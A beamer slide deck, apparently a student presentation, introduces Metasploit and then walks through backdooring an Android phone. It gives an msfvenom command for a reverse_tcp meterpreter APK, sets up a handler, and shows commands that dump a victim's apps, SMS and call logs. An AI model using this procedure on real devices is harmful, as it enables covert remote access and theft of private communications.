\documentclass{beamer}
\usepackage[most]{tcolorbox}
\usepackage[T1]{fontenc}
 
\tcbset{
    frame code={}
    center title,
    left=0pt,
    right=0pt,
    top=0pt,
    bottom=0pt,
    colback=gray!70,
    colframe=white,
    width=\dimexpr\textwidth\relax,
    enlarge left by=0mm,
    boxsep=5pt,
    arc=0pt,outer arc=0pt,
    }
    
\begin{document}

\vspace{-2cm} 
\title{ANDROID HACKING}
\subtitle{using Metasploit}
\author{ISHIKA 2017UCP1566}
\institute{Malaviya National Institute Of Technology, Jaipur}
\date{\today}
\titlegraphic{\includegraphics[width=\textwidth,height=.5\textheight]{metaLogo.jpg}}


\setbeamercolor{normal text}{fg=white}\usebeamercolor*{normal text}
\setbeamercolor{background canvas}{bg=black}
\begin{frame}
\titlepage
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{INTRODUCTION}
\end{tcolorbox}
\begin{itemize}
  \item Metasploit is an open source penetration tool used for developing and executing exploit code against a remote target machine, Metasploit framework has the world’s largest database of public and tested exploits. 
  \item The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection.
  \item At its core, it is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development. 
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{METASPLOIT ARCHITECTURE}
\end{tcolorbox}
\begin{center}
\textbf{FileSystem And Libraries}
\end{center}
The MSF filesystem is laid out in an intuitive manner and is organized by directory.
\begin{itemize}
\item data: editable files used by Metasploit 
\item documentation: provides documentation for the framework
\item external: source code and third-party libraries
\item lib: the ‘meat’ of the framework code base • modules: the actual MSF     modules
\item plugins: plugins that can be loaded at run-time
\item scripts: Meterpreter and other scripts
\item tools: various useful command-line utilities.
\end{itemize}

\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{METASPLOIT ARCHITECTURE}
\end{tcolorbox}
\begin{center}
\vspace{-0.5cm}
\textbf{Modules And Locations}
\end{center}
\begin{flushleft}
\setbeamercolor{normal text}{fg=green}\usebeamercolor*{normal text}
\textbf Exploits 
\setbeamercolor{normal text}{fg=white}\usebeamercolor*{normal text}
\begin{itemize}
    \item Defined as modules that use payloads 
    \item An exploit without a payload is an Auxiliary module 
\end{itemize}
\setbeamercolor{normal text}{fg=green}\usebeamercolor*{normal text}
\textbf Payloads, Encoders, Nops 
\setbeamercolor{normal text}{fg=white}\usebeamercolor*{normal text}
\begin{itemize}
    \item Payloads consist of code that runs remotely
    \item Encoders ensure that payloads make it to their destination
    \item Nops keep the payload sizes consistent
\end{itemize}
\setbeamercolor{normal text}{fg=green}\usebeamercolor*{normal text}
\textbf Primary Module Tree 
\setbeamercolor{normal text}{fg=white}\usebeamercolor*{normal text}
\begin{itemize}
    \item Located under /usr/share/metasploit-framework/modules/ 
\end{itemize}
\setbeamercolor{normal text}{fg=green}\usebeamercolor*{normal text}
\textbf User-Specified Module Tree 
\setbeamercolor{normal text}{fg=white}\usebeamercolor*{normal text}
\begin{itemize}
    \item Located under ~/.msf4/modules/
    \item This location is ideal for private module sets
\end{itemize}
\end{flushleft}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{LOADING MODULES}
\end{tcolorbox}
Metasploit gives you the freedom to load modules either at runtime or after msfconsole has already been started. Pass the -m option when running msfconsole to load at runtime:\linebreak
\begin{center}
\includegraphics[width=.8\textwidth,height=.6\textheight]{msfconsole-m.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{LOADING MODULES}
\end{tcolorbox}
If you need to load additional modules after runtime, use the Metasploit loadpath command from within msfconsole.:\linebreak
\begin{center}
\includegraphics[width=.8\textwidth,height=.6\textheight]{Screenshot from 2020-05-11 14-50-34.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{VULNERABILITY}
\end{tcolorbox}
\begin{itemize}
    \item A vulnerability is a system hole that one can exploit to gain unauthorized access to sensitive data or inject malicious code. Metasploit, like all the others security applications, has a vulnerability scanner which is available in it.
    \item With the help of a vulnerability scanner, nearly all the jobs can be done with one application. Metasploit uses Nexpose to do the scan.
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{METASPLOIT FUNDAMENTALS}
\end{tcolorbox}
\begin{itemize}
    \item Msfconsole interface : The msfconsole is probably the most popular interface to the Metasploit Framework (MSF).
    \item It provides an “all- in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. 
    \item The -q option removes the launch banner by starting msfconsole in quiet mode.
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{BENEFITS OF MSFconsole}
\end{tcolorbox}
\begin{itemize}
    \item It is the only supported way to access most of the features within Metasploit.
    \item Provides a console-based interface to the framework
    \item Contains the most features and is the most stable MSF interface
    \item Full readline support, tabbing, and command completion
    \item Execution of external commands in msfconsole is possible
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{LAUNCHING OF MSFconsole}
\end{tcolorbox}
You can pass -h to msfconsole to see the other usage options available to you.
\begin{center}
\includegraphics[width=.8\textwidth,height=.6\textheight]{msfconsole-h.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{USAGE OF THE COMMAND PROMPT}
\end{tcolorbox}
Entering help or a ? once in the msf command prompt will display a listing of available commands along with a description of what they are used for.
\begin{center}
\includegraphics[width=.8\textwidth,height=.6\textheight]{-help.png}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{TAB COMPLETION}
\end{tcolorbox}
The MSFconsole is designed to be fast to use and one of the features that helps this goal is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module one wishes to make use of. 
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{tabcompl.png}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{EXPLOITS IN METASPLOIT}
\end{tcolorbox}
\begin{center}
    \textbf ACTIVE ATTACKS
\end{center}
\textbf Active exploits will exploit a specific host, run until completion, and then exit
\begin{itemize}
    \item Brute-force modules will exit when a shell opens from the victim.
    \item Module execution stops if an error is encountered.
    \item One can force an active module to the background by passing ‘-j’ to the exploit command
\end{itemize}
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 15-34-54.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{EXPLOITS IN METASPLOIT}
\end{tcolorbox}
\begin{center}
    \textbf PASSIVE ATTACKS
\end{center}
\textbf Passive exploits wait for incoming hosts and exploit them as they connect
\begin{itemize}
    \item Passive exploits almost always focus on clients such as web browsers, FTP clients, etc
    \item They can also be used in conjunction with email exploits, waiting for connections
    \item Passive exploits report shells as they happen can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell.
\end{itemize}
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 15-34-54.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{PAYLOADS}
\end{tcolorbox}
\begin{itemize}
    \item A payload in Metasploit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.
    \item These different types allow for a great deal of versatility and can be useful across numerous types of scenarios.
    \item Whether or not a payload is staged, is represented by ‘/’ in the payload
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{METERPRETER}
\end{tcolorbox}
Since the Meterpreter provides a whole new environment, some of the basic Meterpreter commands to get one started and familiarized with can be found out using help.
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 15-50-13.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{STEPS TO BE FOLLOWED :}
\end{tcolorbox}
\begin{itemize}
    \item Select a right exploit and then set the target.
    \item Verify the exploit options to determine whether the target system is vulnerable to the exploit.
    \item Select a payload 
    \item Execute the exploit. After gathering information about target system
\end{itemize}
\end{frame}



\begin{frame}
\begin{tcolorbox}
\textsc{WHY ANDROID ATTACKS?}
\end{tcolorbox}
\begin{itemize}
    \item More than a billion Android devices could be hacked, experts have warned.
    \item The devices – many of which are in active use and have been bought relatively recently – are no longer support by security updates and so do not receive patches for bugs and other issues, new research has warned.
    \item It means that people using the phones could be hit by bugs that are distributed widely and can be exploited by hackers relatively easily.
    \item A report by consumer group Which? found that about 40 percent of Android users were running older versions of the software, which no longer receives security updates from Google. 
    \item Android is the world's most popular mobile operating system and as a result, Which? says there are potentially millions of smartphone users at risk of data theft and other cyber attacks.
\end{itemize}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{MetaSploit For Android Hacking}
\end{tcolorbox}
\begin{center}
\textbf What method will we be using to hack the phone?\linebreak
Create Backdoor and install that on Victims Phone.\linebreak
\includegraphics[width=.8\textwidth,height=.5\textheight]{4.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{BACKDOOR ?}
\end{tcolorbox}
\begin{itemize}
    \item A Backdoor is a method or a way of bypassing authentication in the product, computer etc. They are usually used for unauthorized access to a computer.
    \item For Android, we are going to create an APK file with a backdoor in it. Android Application Package (APK) is the file format used to distribute and install application software onto the Google’s Android OS. It is similar to the MSI package or a Deb package in Linux based operating system.
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{REQUIREMENTS FOR THE ATTACK : }
\end{tcolorbox}
\begin{itemize}
    \item Metasploit Framework (Pre-Installed on Kali Linux) or installing metasploit on Ubuntu.
    \item Victims Android Smartphone to have installed the APK file
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{DETAILED PROCEDURE OF THE ATTACK : }
\end{tcolorbox}
\begin{itemize}
    \item Open Terminal.
    \item We are going to use Metasploit Venom Framework to create the exploit/backdoor for this tutorial.
    \item Use this command to generate the exploit/Backdoor for the victim :\linebreak
    \texttt{msfvenom -p android/meterpreter/reverse\textunderscore tcp LHOST=192.168.29.14  LPORT=4444 R > hacked.apk}
\end{itemize}
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 17-16-38.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{MSFVENOM }
\end{tcolorbox}
\begin{itemize}
    \item So we are using msfvenom as the exploit generator for an android using Meterpreter for the reverse connection to the attacker’s system.
    \item LHOST defines the attackers IP address where he will get the reverse connection from the victim.
    \item And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable.
    \item hacked.apk refers to the name of the application file to be generated
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{AFTER MSFVENOM}
\end{tcolorbox}
\begin{itemize}
    \item Now we are all ready for the next step as this payload use reverse\textunderscore tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.
    \item So now we need to set up a handler to handle incoming connections to the port let’s do it.
\end{itemize}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{LAUNCH THE MSFCONSOLE: }
\end{tcolorbox}
\begin{itemize}
    \item Open Terminal.
    \item Use this command to launch the console:\linebreak
    \texttt{sudo msfconsole}
\end{itemize}
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 17-33-52.png}
\end{center}
\end{frame}

\begin{frame}
\begin{itemize}
    \item We will use multi/handler, which is a stub that handles exploits launched outside of the framework
    \item When using the exploit/multi/handler module, we still need to tell it which payload to expect so we configure it to have the same settings as the executable we generated. 
    \begin{itemize}
        \item set payload android/meterpreter/reverse\textunderscore tcp
        \item set LPORT = port no.
        \item set LHOST = ip
    \end{itemize}
\end{itemize}
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 17-38-22.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{EXPLOIT }
\end{tcolorbox}
\begin{itemize}
    \item Use this command to start listening :\linebreak
    \texttt{exploit}
    \item Now as soon as the victim installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this.
\end{itemize}
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 17-51-15.png}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{List Of Commands to Extract Information}
\end{tcolorbox}
\begin{center}
\textbf Use the command : help
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 17-55-06.png}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{Extracted Information with command app\textunderscore list:}
\end{tcolorbox}
\begin{center}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 17-58-42.png}
\end{center}
\end{frame}

\begin{frame}
\begin{tcolorbox}
\textsc{Extracted Information with command dump\textunderscore sms:}
\end{tcolorbox}
\begin{center}
\includegraphics[width=.5\textwidth,height=.3\textheight]{Screenshot from 2020-05-11 18-07-41.png}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 18-04-58.png}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{Extracted Information with command dump\textunderscore calllog:}
\end{tcolorbox}
\begin{center}
\includegraphics[width=.5\textwidth,height=.3\textheight]{Screenshot from 2020-05-12 20-33-34.png}
\includegraphics[width=.8\textwidth,height=.5\textheight]{Screenshot from 2020-05-12 20-30-26.png}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{Extracted Information with other commands}
\end{tcolorbox}
\begin{center}
\includegraphics[width=.5\textwidth,height=.5\textheight]{Screenshot from 2020-05-11 18-19-21.png}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{MORAL}
\end{tcolorbox}
\begin{center}
\begin{itemize}
    \item \textbf{APPS SHOULD NOT DOWNLOADED FROM RANDOM/UNSAFE SOURCES.}
    \item \textbf{ONE SHOULD BE CAREFUL ABOUT THE PERMISSIONS GIVEN TO ANY APPLICATION.}
\end{itemize}
\end{center}
\end{frame}


\begin{frame}
\begin{tcolorbox}
\textsc{REFERENCES :}
\end{tcolorbox}
\begin{center}
\begin{itemize}
    \item \textbf{https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md}
    \item \textbf{https://www.offensive-security.com/metasploit-unleashed/}
    \item \textbf{https://securitytraning.com/hack-android-smartphone-using-metasploit/}
    \item \textbf{https://www.youtube.com/watch?v=AyMgYhwyGSE}
\end{itemize}
\end{center}
\end{frame}

\begin{frame}
\begin{center}
\textbf{THANK YOU!}
\end{center}
\begin{flushright}
\textbf{\linebreak \linebreak \linebreak ISHIKA \linebreak 2017UCP1566 \linebreak B-3}
\end{flushright}
\end{frame}



\end{document}